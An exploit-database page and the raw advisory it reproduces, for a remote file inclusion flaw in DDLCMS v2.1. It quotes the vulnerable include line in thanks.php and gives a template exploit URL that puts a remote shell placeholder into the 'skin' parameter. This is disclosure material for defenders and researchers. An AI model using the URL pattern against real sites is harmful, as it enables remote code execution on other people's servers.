header-logo
Suggest Exploit
vendor:
DDLCMS
by:
eidelweiss
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: DDLCMS
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:ddlcms:ddlcms:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability

The 'skin' parameter in FILE thanks.php is not Defined which can allow remote attacker to include remote file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the 'skin' parameter.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
Source

Exploit-DB raw data:

==============================================================
DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability
==============================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ########################################          1
0                    I'm eidelweiss member from Inj3ct0r Team          1
1                    ########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor:		www.ddlcms.com
download:	http://www.ddlcms.com/download.php
Author:		eidelweiss
Contact:		g1xsystem[at]windowslive.com

=====================================================================

	-=[ Vuln Code ]=-

[-] /thanks.php

	include(WWWROOT . 'skins/' . $skin . '/header.php');	// line 46
	include(WWWROOT . 'leftside.php');

=====================================================================

	-=[ P0C ]=-

"skin" parameter in FILE thanks.php is not Defined which can allow remote attackers to execute arbitrary PHP code via a URL

	-=[ exploit ]=-

	http://127.0.0.1/thanks.php?skin= [inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |=========================